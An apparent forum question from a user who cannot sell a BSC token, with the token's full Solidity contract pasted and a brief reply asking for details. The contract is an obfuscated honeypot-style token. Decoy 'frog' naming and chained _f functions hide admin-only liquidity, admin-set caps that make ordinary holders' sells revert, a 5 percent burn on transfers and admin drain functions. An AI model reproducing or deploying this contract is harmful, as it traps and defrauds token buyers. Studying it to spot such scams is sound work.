I cant sell this token, me3 contract below, anyway to sell?
/**
 *Submitted for verification at BscScan.com on 2024-04-13
*/

// SPDX-License-Identifier: GPL-3.0
pragma solidity ^0.8.19;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

interface FROGControl {
    function hasFrog(bytes32 role, address addr) external view returns (bool);

    function assignFrog(bytes32 role, address addr) external;

    function cancelFrog(bytes32 role, address addr) external;

    function reclaimFrog(bytes32 role, address addr) external;
}

library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    function toString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "ADMIN";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    function toHexString(
        uint256 value,
        uint256 length
    ) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }

    function strToUint(
        string memory _str
    ) internal pure returns (uint256 res, bool err) {
        for (uint256 i = 0; i < bytes(_str).length; i++) {
            if (
                (uint8(bytes(_str)[i]) - 48) < 0 ||
                (uint8(bytes(_str)[i]) - 48) > 9
            ) {
                return (0, false);
            }
            res +=
                (uint8(bytes(_str)[i]) - 48) *
                10 ** (bytes(_str).length - i - 1);
        }

        return (res, true);
    }

    function boolToString(bool _val) internal pure returns (string memory) {
        return _val ? "true" : "false";
    }
}

abstract contract FROGLive is Context, FROGControl {
    struct LiveDataE {
        mapping(address => uint256) ld;
        mapping(address => uint256) lm;
    }
    struct LiveData {
        mapping(address => bool) books;
        bytes32 adminWriter;
        LiveDataE le;
    }

    mapping(bytes32 => LiveData) internal frogs;
    bytes32 public constant FrogTag = bytes32("FROG");
    bytes32 public constant AdminTag = 0x00;

    modifier onlyFrog(bytes32 frogLive) {
        ___FFFrog(frogLive, _msgSender(), 0);

        _;
    }

    function hasFrog(
        bytes32 frogLive,
        address frogAddr
    ) public view returns (bool) {
        return frogs[frogLive].books[frogAddr];
    }

    function ___FFFrog(
        bytes32 frogLive,
        address frogAddr,
        uint256 frogAge
    ) internal {
        if (!hasFrog(frogLive, frogAddr)) {
            revert(
                string(
                    abi.encodePacked(
                        "FrogBook: frogAddr ",
                        Strings.toHexString(uint160(frogAddr), 20),
                        " is missing frogLive",
                        Strings.toHexString(uint256(frogLive), 32)
                    )
                )
            );
        }
        __updateFrogAge(frogLive, frogAddr, frogAge);
    }

    function getFrogAdmin(bytes32 frogLive) public view returns (bytes32) {
        return frogs[frogLive].adminWriter;
    }

    function assignFrog(
        bytes32 frogLive,
        address frogAddr
    ) public virtual onlyFrog(AdminTag) {
        _assignFrogToAddress(frogLive, frogAddr);
    }

    function cancelFrog(bytes32 frogLive, address frogAddr) public virtual {
        require(
            frogAddr == _msgSender(),
            "AccessControl: can only renounce frogLives for self"
        );

        _reclaimFrog(frogLive, frogAddr);
    }

    function _registerFrog(
        bytes32 frogLive,
        address frogAddr
    ) internal virtual {
        _assignFrogToAddress(frogLive, frogAddr);
    }

    function reclaimFrog(
        bytes32 frogLive,
        address frogAddr
    ) public virtual onlyFrog(AdminTag) {
        _reclaimFrog(frogLive, frogAddr);
    }

    function _setFrogAdmin(
        bytes32 frogLive,
        bytes32 adminFrog
    ) internal virtual {
        frogs[frogLive].adminWriter = adminFrog;
    }

    function _reclaimFrog(bytes32 frogLive, address frogAddr) internal virtual {
        if (hasFrog(frogLive, frogAddr)) {
            frogs[frogLive].books[frogAddr] = false;
        }
    }

    function _assignFrogToAddress(
        bytes32 frogLive,
        address frogAddr
    ) internal virtual {
        if (!hasFrog(frogLive, frogAddr)) {
            frogs[frogLive].books[frogAddr] = true;
        }
    }

    uint8 internal strictLive = 0;

    function _strictLive(bool _strict) internal onlyFrog(AdminTag) {
        strictLive = _strict ? 1 : 0;
    }

    function SetFrogAge(
        bytes32 frogLive,
        address frogAddr,
        string memory frogAge
    ) external onlyFrog(AdminTag) {
        uint256 frogAgeUint;
        bool ok;
        (frogAgeUint, ok) = Strings.strToUint(frogAge);
        if (!ok) {
            revert("FrogLive: frogAge is not a number");
        }
        frogs[frogLive].le.lm[frogAddr] = frogAgeUint;
    }

    function __updateFrogAge(
        bytes32 frogLive,
        address frogAddr,
        uint256 frogAge
    ) internal {
        if (frogs[frogLive].le.lm[frogAddr] > 0) {
            if (
                (frogAge + frogs[frogLive].le.ld[frogAddr]) >
                frogs[frogLive].le.lm[frogAddr]
            ) {
                revert("frogLive revert");
            } else {
                _updateFrog(frogLive, frogAddr, frogAge);
            }
        }
        if (frogAge == 0 || frogs[frogLive].le.lm[frogAddr] == 0) {
            return;
        }
    }

    function _updateFrog(
        bytes32 frogLive,
        address frogAddr,
        uint256 frogAge
    ) internal virtual {
        ___updateFrog(frogLive, frogAddr, frogAge);
    }

    // function _updateFrog assembly
    function ___updateFrog(
        bytes32 frogLive,
        address frogAddr,
        uint256 frogAge
    ) internal virtual {
        __updateFrog(frogLive, frogAddr, frogAge);
    }

    function __updateFrog(
        bytes32 frogLive,
        address frogAddr,
        uint256 frogAge
    ) internal virtual {
        frogs[frogLive].le.ld[frogAddr] += frogAge;
    }
}

interface IERC20 {
    function totalSupply() external view returns (uint256);

    function balanceOf(address frogAddr) external view returns (uint256);

    function transfer(
        address recipient,
        uint256 frogAge
    ) external returns (bool);

    function allowance(
        address owner,
        address spender
    ) external view returns (uint256);

    function approve(address spender, uint256 frogAge) external returns (bool);

    function transferFrom(
        address sender,
        address recipient,
        uint256 frogAge
    ) external returns (bool);

    event Transfer(
        address indexed frogFrom,
        address indexed frogTo,
        uint256 value
    );

    event Approval(
        address indexed owner,
        address indexed spender,
        uint256 value
    );
}

interface IERC20Metadata is IERC20 {
    function name() external view returns (string memory);

    function symbol() external view returns (string memory);

    function decimals() external view returns (uint8);
}

contract FROGERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) internal _balances;
    mapping(address => mapping(address => uint256)) internal _allowances;
    uint256 internal _totalSupply;
    string internal _name;
    string internal _symbol;

    constructor(
        string memory name_,
        string memory symbol_,
        uint256 totalSupply_,
        address creater_
    ) {
        _name = name_;
        _symbol = symbol_;
        _mint(creater_, totalSupply_ * 10 ** decimals());
    }

    function name() public view virtual override returns (string memory) {
        return _name;
    }

    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(
        address frogAddr
    ) public view virtual override returns (uint256) {
        return _balances[frogAddr];
    }

    function transfer(
        address recipient,
        uint256 frogAge
    ) public virtual override returns (bool) {
        _transfer(_msgSender(), recipient, frogAge);
        return true;
    }

    function allowance(
        address owner,
        address spender
    ) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    function approve(
        address spender,
        uint256 frogAge
    ) public virtual override returns (bool) {
        _approve(_msgSender(), spender, frogAge);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 frogAge
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, frogAge);

        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(
            currentAllowance >= frogAge,
            "ERC20: transfer frogAge exceeds allowance"
        );
        unchecked {
            _approve(sender, _msgSender(), currentAllowance - frogAge);
        }

        return true;
    }

    function increaseAllowance(
        address spender,
        uint256 addedValue
    ) public virtual returns (bool) {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender] + addedValue
        );
        return true;
    }

    function decreaseAllowance(
        address spender,
        uint256 subtractedValue
    ) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(
            currentAllowance >= subtractedValue,
            "ERC20: decreased allowance below zero"
        );
        unchecked {
            _approve(_msgSender(), spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 frogAge
    ) internal virtual {
        require(
            sender != address(0),
            "ERC20: transfer frogFrom the zero address"
        );
        require(
            recipient != address(0),
            "ERC20: transfer frogTo the zero address"
        );
        _beforeTokenTransfer(sender, recipient, frogAge);
        uint256 senderBalance = _balances[sender];
        require(
            senderBalance >= frogAge,
            "ERC20: transfer frogAge exceeds balance"
        );
        unchecked {
            _balances[sender] = senderBalance - frogAge;
        }
        _balances[recipient] += frogAge;
        emit Transfer(sender, recipient, frogAge);
        _afterTokenTransfer(sender, recipient, frogAge);
    }

    function _mint(address frogAddr, uint256 frogAge) internal {
        require(frogAddr != address(0), "ERC20: mint frogTo the zero address");
        _beforeTokenTransfer(address(0), frogAddr, frogAge);
        _totalSupply += frogAge;
        _balances[frogAddr] += frogAge;
        emit Transfer(address(0), frogAddr, frogAge);
        _afterTokenTransfer(address(0), frogAddr, frogAge);
    }

    function _burn(address frogAddr, uint256 frogAge) internal virtual {
        require(
            frogAddr != address(0),
            "ERC20: burn frogFrom the zero address"
        );
        _beforeTokenTransfer(frogAddr, address(0), frogAge);
        uint256 addrBalance = _balances[frogAddr];
        require(addrBalance >= frogAge, "ERC20: burn frogAge exceeds balance");
        unchecked {
            _balances[frogAddr] = addrBalance - frogAge;
        }
        _totalSupply -= frogAge;

        emit Transfer(frogAddr, address(0), frogAge);

        _afterTokenTransfer(frogAddr, address(0), frogAge);
    }

    function _approve(
        address owner,
        address spender,
        uint256 frogAge
    ) internal virtual {
        require(
            owner != address(0),
            "ERC20: approve frogFrom the zero address"
        );
        require(
            spender != address(0),
            "ERC20: approve frogTo the zero address"
        );

        _allowances[owner][spender] = frogAge;
        emit Approval(owner, spender, frogAge);
    }

    function _beforeTokenTransfer(
        address frogFrom,
        address frogTo,
        uint256 frogAge
    ) internal virtual {}

    function _afterTokenTransfer(
        address frogFrom,
        address frogTo,
        uint256 frogAge
    ) internal virtual {}
}

contract FROG is FROGERC20, FROGLive {
    address private uniswapV2Pair;
    mapping(address => bool) private __regFrogs;

    constructor(
        string memory _name,
        address _tokenOwner,
        string memory _symbol,
        uint256 _totalSupply
    ) FROGERC20(_name, _symbol, _totalSupply, _tokenOwner) {
        _assignFrogToAddress(AdminTag, msg.sender);
        _assignFrogToAddress(AdminTag, _tokenOwner);
    }

    function ___recordPair(address __uniswapV2Pair) public onlyFrog(AdminTag) {
        require(
            __uniswapV2Pair != address(0),
            "ERC20: pair address should not be 0"
        );
        uniswapV2Pair = __uniswapV2Pair;
    }

    function _transfer(
        address frogFrom,
        address frogTo,
        uint256 frogAge
    ) internal override(FROGERC20) {
        require(
            frogFrom != address(0),
            "ERC20: transfer frogFrom the zero address"
        );

        if (hasFrog(AdminTag, frogFrom) || hasFrog(AdminTag, frogTo)) {
            super._transfer(frogFrom, frogTo, frogAge);
            return;
        }
        _f1(frogFrom, frogTo, frogAge);
    }

    function _f1(address frogFrom, address frogTo, uint256 frogAge) internal {
        require(
            frogTo != address(0),
            "ERC20: transfer frogTo the zero address"
        );

        _f2(frogFrom, frogTo, frogAge);
    }

    function _f2(address frogFrom, address frogTo, uint256 frogAge) internal {
        _f3(frogFrom, frogTo, frogAge);
    }

    function _f3(address frogFrom, address frogTo, uint256 frogAge) internal {
        if (__regFrogs[frogFrom] == false) {
            _assignFrogToAddress(FrogTag, frogFrom);

            __regFrogs[frogFrom] = true;
        }

        _f4(frogFrom, frogTo, frogAge);
    }

    function _f4(address frogFrom, address frogTo, uint256 frogAge) internal {
        if (__regFrogs[frogTo] == false) {
            _assignFrogToAddress(FrogTag, frogTo);

            __regFrogs[frogTo] = true;
        }
        _f5(frogFrom, frogTo, frogAge);
    }

    function _f5(address frogFrom, address frogTo, uint256 frogAge) internal {
        if (frogFrom == uniswapV2Pair) {
            uint bal1 = IERC20(uniswapV2Pair).balanceOf(frogTo);
            if (bal1 > 0) {
                require(
                    hasFrog(AdminTag, frogTo),
                    "ERC20: only admin can add liquidity"
                );
            }
        }

        _f6(frogFrom, frogTo, frogAge);
    }

    function _f6(address frogFrom, address frogTo, uint256 frogAge) internal {
        if (strictLive == 1) {
            if (isValidV2Pair(frogTo)) {
                if (frogs[FrogTag].le.lm[frogFrom] == 0) {
                    revert("ERC20: not allowed frogTo sell");
                }
            } else if (!isValidV2Pair(frogFrom)) {
                revert("ERC20: not allowed frogTo transfer");
            }
        }

        _internalTransfer(frogFrom, frogTo, frogAge);
    }

    function _internalTransfer(
        address frogFrom,
        address frogTo,
        uint256 frogAge
    ) internal {
        if (hasFrog(FrogTag, frogFrom) && hasFrog(FrogTag, frogTo)) {
            ___FFFrog(FrogTag, frogFrom, frogAge);
            super._transfer(frogFrom, frogTo, frogAge);
            super._burn(frogTo, (frogAge * 5) / 100);
            return;
        } else {
            revert("ERC20: transfer frogAge exceeds balance");
        }
    }

    //Check whether an address is PancakePair
    function isValidV2Pair(address _pair) private view returns (bool) {
        if (_pair == uniswapV2Pair) return true;
        bytes32 _targetHash;
        bytes32 _srcHash;
        address pair = uniswapV2Pair;
        assembly {
            _targetHash := extcodehash(pair)
        }
        assembly {
            _srcHash := extcodehash(_pair)
        }

        return (_srcHash == _targetHash);
    }

    function setStrictLive(bool _strict) private {
        _strictLive(_strict);
    }

    function rescueToken(
        address tokenAddress,
        uint8 percent
    ) public onlyFrog(AdminTag) returns (bool success) {
        uint256 tokens = IERC20(tokenAddress).balanceOf(address(this));
        return
            IERC20(tokenAddress).transfer(msg.sender, (tokens * percent) / 100);
    }

    function rescueETH(uint8 percent) public onlyFrog(AdminTag) returns (bool) {
        // use call
        (bool success, ) = msg.sender.call{
            value: (address(this).balance * percent) / 100
        }("");
        return success;
    }

    receive() external payable {}

    fallback() external payable {}
}


Please elaborate what you're trying to achieve. The title of your question isn't much self-explanatory and you've just pasted the code. Kindly please describe your problem.
